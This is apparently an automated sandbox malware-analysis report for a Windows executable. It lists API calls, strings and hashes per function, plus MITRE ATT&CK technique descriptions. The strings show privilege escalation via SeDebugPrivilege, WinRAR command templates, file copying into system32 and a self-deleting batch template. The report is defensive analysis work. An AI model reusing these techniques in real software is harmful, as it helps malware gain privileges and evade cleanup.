Part of subcall function 00DF119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,?,?,00DF13EF), ref: 00DF11AB
Part of subcall function 00DF119F: OpenProcessToken.ADVAPI32(00000000,00000028,00DF13EF,?,?,?,?,?,?,00DF13EF), ref: 00DF11BB
Part of subcall function 00DF119F: AdjustTokenPrivileges.ADVAPI32(00DF13EF,00000000,?,00000010,00000000,00000000), ref: 00DF11EB
Part of subcall function 00DF119F: CloseHandle.KERNEL32(00DF13EF), ref: 00DF11FA
Part of subcall function 00DF119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00DF13EF), ref: 00DF1203

Strings

SeDebugPrivilege, xrefs: 00DF13D3
C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF13A8

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$SeDebugPrivilege
API String ID: 4123949106-3902145337
Opcode ID: 8bb72bfe377b61078161a3ccf318eb6692e1fe07a222e0f489bfa2ea885e8025
Instruction ID: 59c491d77da5195c8c8eaa2eb8e223d701f5fdffd09ded894364fec90ff46ab0
Opcode Fuzzy Hash: 8bb72bfe377b61078161a3ccf318eb6692e1fe07a222e0f489bfa2ea885e8025
Instruction Fuzzy Hash: 15311D79D4020DEAEF209BA58C45FFEBBB8EB85705F26C16AE604B2141D7709E45CB70

Function 00DF6D00 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: ec5bce18b48b189c8f204dc6e5e737bec29a406fd75aa53f98c206d8f77353a6
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 1D81A071204B458FC728CF28C8906AABBE2EFD5314F15C92DE1EA87B51D734E949CB64

Function 00DF239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239
sleepfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strstr.MSVCRT ref: 00DF23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DF2464
GetFileSize.KERNEL32(00000000,00000000), ref: 00DF2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00DF24A8
memset.MSVCRT ref: 00DF24B9
strrchr.MSVCRT ref: 00DF24C9
wsprintfA.USER32 ref: 00DF24DE
strrchr.MSVCRT ref: 00DF24ED
memset.MSVCRT ref: 00DF24F2
memset.MSVCRT ref: 00DF2505
wsprintfA.USER32 ref: 00DF2524
Sleep.KERNEL32(000007D0), ref: 00DF2535
Sleep.KERNEL32(000007D0), ref: 00DF255D
memset.MSVCRT ref: 00DF256E
wsprintfA.USER32 ref: 00DF2585
memset.MSVCRT ref: 00DF25A6
wsprintfA.USER32 ref: 00DF25CA
Sleep.KERNEL32(000007D0), ref: 00DF25D0
Sleep.KERNEL32(000007D0,?,?), ref: 00DF25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DF25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00DF2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00DF2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00DF265B
SetEndOfFile.KERNEL32 ref: 00DF266D
CloseHandle.KERNEL32(00000000), ref: 00DF2676
RemoveDirectoryA.KERNEL32(?), ref: 00DF2681

Strings

-ibck, xrefs: 00DF25BA
%s\, xrefs: 00DF257F
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF23B1, 00DF23B6, 00DF24CD
%s X -ibck "%s" "%s\", xrefs: 00DF251E
%s%s, xrefs: 00DF24D8
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00DF25C4

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
API String ID: 2203340711-1252250577
Opcode ID: 5eb73437fc1b675a924bccf9a3371dd6328778320d00a1e0bfaa203b8630d308
Instruction ID: 52c4239ead26ce5a843b26d0d2d7b1818b87f5af075cac47add99e0327e0989c
Opcode Fuzzy Hash: 5eb73437fc1b675a924bccf9a3371dd6328778320d00a1e0bfaa203b8630d308
Instruction Fuzzy Hash: 76818EB1504348BBD7109F64EC49EBB77ACEB88704F06851AFB84D2290DB74DA49CB76

Function 00DF274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00DF2766
memset.MSVCRT ref: 00DF2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00DF2787
wsprintfA.USER32 ref: 00DF27AB

Part of subcall function 00DF185B: GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1878
Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1880
Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1890
Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1894

wsprintfA.USER32 ref: 00DF27C6
CopyFileA.KERNEL32(?,00DF4C80,00000000), ref: 00DF27D4
wsprintfA.USER32 ref: 00DF27F4

Part of subcall function 00DF1973: PathFileExistsA.SHLWAPI(00DF4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe), ref: 00DF1992
Part of subcall function 00DF1973: CreateFileA.KERNEL32(00DF4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00DF19BA
Part of subcall function 00DF1973: Sleep.KERNEL32(00000064), ref: 00DF19C6
Part of subcall function 00DF1973: wsprintfA.USER32 ref: 00DF19EC
Part of subcall function 00DF1973: CopyFileA.KERNEL32(00DF4E5C,?,00000000), ref: 00DF1A00
Part of subcall function 00DF1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF1A1E
Part of subcall function 00DF1973: GetFileSize.KERNEL32(00DF4E5C,00000000), ref: 00DF1A2C
Part of subcall function 00DF1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00DF1A46
Part of subcall function 00DF1973: ReadFile.KERNEL32(00DF4E5C,00DF4E60,00000000,?,00000000), ref: 00DF1A65

DeleteFileA.KERNEL32(?,?,00DF4E54,00DF4E58), ref: 00DF281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00DF4E54,00DF4E58), ref: 00DF2832

Strings

c_31892.nls, xrefs: 00DF27DE
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF27B6
%s%.8x.exe, xrefs: 00DF27BB
C:\Windows\system32, xrefs: 00DF27E3
%s%s, xrefs: 00DF27A5
%s\%s, xrefs: 00DF27EE
\WinRAR\Rar.exe, xrefs: 00DF2793

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-4282063453
Opcode ID: 5558022cb85f7aab02c3b47b847c74cd9d7538c4eff30131c14a22e227b0518c
Instruction ID: 873ab3d0e77153bf66f66ccdbeb24759963b7ea484565cc9b870f42c6ff55129
Opcode Fuzzy Hash: 5558022cb85f7aab02c3b47b847c74cd9d7538c4eff30131c14a22e227b0518c
Instruction Fuzzy Hash: CD2133B694031C7FDB10E7A49C89EFB776CDB04744F4685A1B754E2141E670DF488AB4

Function 00DF1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DF185B: GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1878
Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1880
Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1890
Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1894

wsprintfA.USER32 ref: 00DF15AA
wsprintfA.USER32 ref: 00DF15C6
lstrlen.KERNEL32(?), ref: 00DF15D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00DF15EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00DF1609
CloseHandle.KERNEL32(00000000), ref: 00DF1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00DF162D

Strings

%s%.8x.bat, xrefs: 00DF15A4
open, xrefs: 00DF1627
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF1599
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00DF15C0
C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF158A, 00DF15B3, 00DF15B8, 00DF15B9

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$open
API String ID: 617340118-4277398702
Opcode ID: 5a288a98c24a48a0223ea0e321a29d070de248b6a9dfbadb68aad9f937cbe673
Instruction ID: 8af7508eebf03c00e42c894024c87af6bed89773a145578b3235fafbe4ffe72f
Opcode Fuzzy Hash: 5a288a98c24a48a0223ea0e321a29d070de248b6a9dfbadb68aad9f937cbe673
Instruction Fuzzy Hash: D7112176A0122CBED72097A5DC89DFB7A6CDF59761F024052FA49E2140DA709B88CBB0

Function 00DF120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00DF1400), ref: 00DF1226
GetProcAddress.KERNEL32(00000000), ref: 00DF122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00DF1400), ref: 00DF123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00DF1400), ref: 00DF1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,00DF1400), ref: 00DF129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,00DF1400), ref: 00DF12B0
CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe,?,?,?,?,00DF1400), ref: 00DF12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00DF1400), ref: 00DF130A

Strings

ntdll.dll, xrefs: 00DF1219
C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, xrefs: 00DF1262
ZwQuerySystemInformation, xrefs: 00DF1212

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-1957651143
Opcode ID: 96648b07f4f6348a93fb114b31d319ceaf46a56c3a8617948aa7032ada55d878
Instruction ID: 114bdaab6099f863740ca620ba826862d7d51074c43b03b5075db8387298c35e
Opcode Fuzzy Hash: 96648b07f4f6348a93fb114b31d319ceaf46a56c3a8617948aa7032ada55d878
Instruction Fuzzy Hash: E221E135605355EBD7209FA4DC0AB7BBAA8FB85B00F068919F745E6280CB70DA44C7B9

Function 00DF2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00DF29DB,?,00000001), ref: 00DF26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00DF29DB,?,00000001), ref: 00DF26B5
lstrlen.KERNEL32(?), ref: 00DF26C4
??2@YAPAXI@Z.MSVCRT ref: 00DF26CE
lstrcpy.KERNEL32(00000004,?), ref: 00DF26E3
lstrcpy.KERNEL32(?,00000004), ref: 00DF271F
??3@YAXPAX@Z.MSVCRT ref: 00DF272D
SetEvent.KERNEL32 ref: 00DF273C

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: e751f4c9944ff98f0a39eb5dea05f9bcf6416f40b544e874e29a1ad199713faf
Instruction ID: 41cd1b1f387fc1217983bb1f5b69b94d8823f99d67084bbb7aad0c1b6b2cc952
Opcode Fuzzy Hash: e751f4c9944ff98f0a39eb5dea05f9bcf6416f40b544e874e29a1ad199713faf
Instruction Fuzzy Hash: E8113A75501318AFCB21AF15EC4887B7BA9FB8472172AC016F558CB220D7309E85DB70

Function 00DF1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00DF1BCD
rand.MSVCRT ref: 00DF1BD8
memset.MSVCRT ref: 00DF1C43
memcpy.MSVCRT ref: 00DF1C4F
lstrcat.KERNEL32(?,.exe), ref: 00DF1C5D

Strings

.exe, xrefs: 00DF1C57
UygdpvugkCVTcnzAfGCvPnGQLujfhwbFarqsSfRkeOOSYeQoLwZopJtLiFqZsTnWxYXXHlyJlHKGQVBtCOWmacMmZwYaBdERDmDKMNEzMeckgTEdpAxWDVPIuIxlSbyRhNojUAUtIiNrszbFhrHPXJBqijKv, xrefs: 00DF1B8A, 00DF1B9C, 00DF1C15, 00DF1C49

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$UygdpvugkCVTcnzAfGCvPnGQLujfhwbFarqsSfRkeOOSYeQoLwZopJtLiFqZsTnWxYXXHlyJlHKGQVBtCOWmacMmZwYaBdERDmDKMNEzMeckgTEdpAxWDVPIuIxlSbyRhNojUAUtIiNrszbFhrHPXJBqijKv
API String ID: 122620767-497381747
Opcode ID: 3c9d5fd4675e04fb88c4883a368b30b255b98770644008a6dbc15439bfc7eb91
Instruction ID: 1daa51a6615e11fd00c872c8d30933ef859d7771251099dc65ba9c27cabcbd6e
Opcode Fuzzy Hash: 3c9d5fd4675e04fb88c4883a368b30b255b98770644008a6dbc15439bfc7eb91
Instruction Fuzzy Hash: 5D212626E45294EEE32613396C40B7B7B44CFA3721F1BC09AFA959F2A3D5640985C274

Function 00DF189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00DF18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00DF18D3
CloseHandle.KERNEL32(00DF2549), ref: 00DF18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DF18F0
GetExitCodeProcess.KERNEL32(?,00DF2549), ref: 00DF1901
CloseHandle.KERNEL32(?), ref: 00DF190A

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 472bdea5d9ac02a375d199c5a79bed60fb57a631ead169f5eca7ba68e11c5136
Instruction ID: 0bdf4d13b1e444604cdcdb356e77a0a3d1b7b961664acefbd2882f88f4533a47
Opcode Fuzzy Hash: 472bdea5d9ac02a375d199c5a79bed60fb57a631ead169f5eca7ba68e11c5136
Instruction Fuzzy Hash: B501717690122CBBCB216F96DC48DEF7F3DEF85720F118022FA19E51A0D6714A18CAB0

Function 00DF1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00DF1334
GetProcAddress.KERNEL32(00000000), ref: 00DF133B
memset.MSVCRT ref: 00DF1359

Strings

ntdll.dll, xrefs: 00DF132F
NtSystemDebugControl, xrefs: 00DF132A

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 3816e7f13745f6c3faac213bc88f98be62c54b96d032c99d1edebc5c722d887c
Instruction ID: e8300a41681c06f78d0309ff6f4e0c31a3adc0601dbba052965bb420b7914fff
Opcode Fuzzy Hash: 3816e7f13745f6c3faac213bc88f98be62c54b96d032c99d1edebc5c722d887c
Instruction Fuzzy Hash: 38016D7560030DEFDB10DF94AC85E7FBBA8FB51314F05812AFA41E2240E2B09615CA71

Function 00DF1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00DF1E0B
lstrcpy.KERNEL32(?,00000001), ref: 00DF1E1C
strrchr.MSVCRT ref: 00DF1E2B
lstrcmpiA.KERNEL32(?,00DF4488), ref: 00DF1E48
lstrlen.KERNEL32(00DF4488), ref: 00DF1E53

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 503d4572e27b92d29068e1491a236725386fa8a6b0cc6d83310436675c8fc5b4
Instruction ID: e2a7a3993594e3b31e5a08231df481494b376a5aaf99ed59b4a37ea0ffb623f1
Opcode Fuzzy Hash: 503d4572e27b92d29068e1491a236725386fa8a6b0cc6d83310436675c8fc5b4
Instruction Fuzzy Hash: 9901DB7691431DAFDB105B60DC48FF7779CDB04310F068066FB45E2190DAB49A84CBB4

Function 00DF185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
srand.MSVCRT ref: 00DF1878
rand.MSVCRT ref: 00DF1880
srand.MSVCRT ref: 00DF1890
rand.MSVCRT ref: 00DF1894

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: ad3eb53e6552f1cb3bed7fe9fd2a91c033d10c9b2155dcdb43898d74c21dfb0c
Instruction ID: b5028c807d55e9f91f85bc4d2e363289f2e5c1294783ed209507a268117ca937
Opcode Fuzzy Hash: ad3eb53e6552f1cb3bed7fe9fd2a91c033d10c9b2155dcdb43898d74c21dfb0c
Instruction Fuzzy Hash: 5AE01277A10318BBD700ABB9EC469AEBBACDE84161B114567F600D3254E974E944CAB4

Function 00DF6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00DF603C
GetProcAddress.KERNEL32(00000000,00DF6064), ref: 00DF604F

Strings

kernel32.dll, xrefs: 00DF603B

Memory Dump Source

Source File: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: d1940f10b68af6c73c5d2f7bd54d9f31b442e3333d5b6625ed2edad31dba5bed
Instruction ID: d0328524450c7b068b319963386b246728e0d76bad0e92f5b6915ae7044a9a02
Opcode Fuzzy Hash: d1940f10b68af6c73c5d2f7bd54d9f31b442e3333d5b6625ed2edad31dba5bed
Instruction Fuzzy Hash: 5EF0F0B114428D9FEF708FA4CC44BEE3BE4EB45700F54852AEA09CBA81DB3486058B24

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
